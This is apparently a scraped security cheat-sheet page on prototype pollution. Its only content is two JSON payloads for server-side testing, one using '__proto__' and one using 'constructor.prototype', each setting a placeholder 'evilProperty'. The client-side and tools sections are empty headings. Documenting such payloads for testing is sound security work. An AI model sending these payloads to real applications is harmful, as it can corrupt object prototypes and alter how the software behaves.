Prototype pollution
Server-side prototype pollution
JSON-based input
{
"__proto__":{
"evilProperty": "evilValue"
}
}{
"constructor": {
"prototype": {
"evilProperty": "evilValue"
}
}
}Herramientas
Client-side prototype pollution
Herramientas
Última actualización